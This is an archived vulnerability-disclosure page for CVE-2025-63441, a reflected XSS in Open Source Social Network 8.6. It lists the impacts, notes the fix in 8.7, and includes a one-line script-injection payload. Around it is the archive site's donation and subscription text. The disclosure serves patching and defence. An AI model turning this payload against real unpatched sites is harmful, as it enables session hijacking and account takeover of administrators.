Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1110 CNY

100%
Buy Us a Coffee

CVE-2025-63441 PoC — Open Source Social Network 安全漏洞

Source
https://github.com/Kgan0509/CVE-2025-63441
Associated Vulnerability
Title:Open Source Social Network 安全漏洞 (CVE-2025-63441)
Description:Open Source Social Network (OSSN) 8.6 is vulnerable to Cross Site Scripting (XSS) via the parameter param` at endpoint u/administrator/friends.
Readme
# CVE-2025-63441

**Title:** 
Reflected XSS via `arbitrarily supplied URL parameter param` at endpoint `u/administrator/friends`

**Summary:**
A Reflected Cross-Site Scripting (XSS) vulnerability was identified in the u/administrator/friends endpoint of the OSSN application.
This vulnerability allows attackers to inject malicious scripts the name of an arbitrarily supplied URL parameter.

**Impact:**
- Perform virtual defacement of the web site.
- Carry out any action that the user is able to perform.
- Redirecting the user to a competing site.
- Capture the user's(admin) session cookie.

Fixed in OSSN 8.7 and above
**github:** https://github.com/opensource-socialnetwork/opensource-socialnetwork/issues/2501 

**PoC:**
Payload: ?tcjz4'><script>alert(origin)<%2fscript>fefyj=1
<img width="1918" height="962" alt="image" src="https://github.com/user-attachments/assets/9843e99d-5623-47d7-ac68-1a21b2e70f8f" />
File Snapshot

 [4.0K]  /data/pocs/0913e802f3cef838e009ed37cf57c8240c522f25
└── [ 920]  README.md

1 directory, 1 file
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →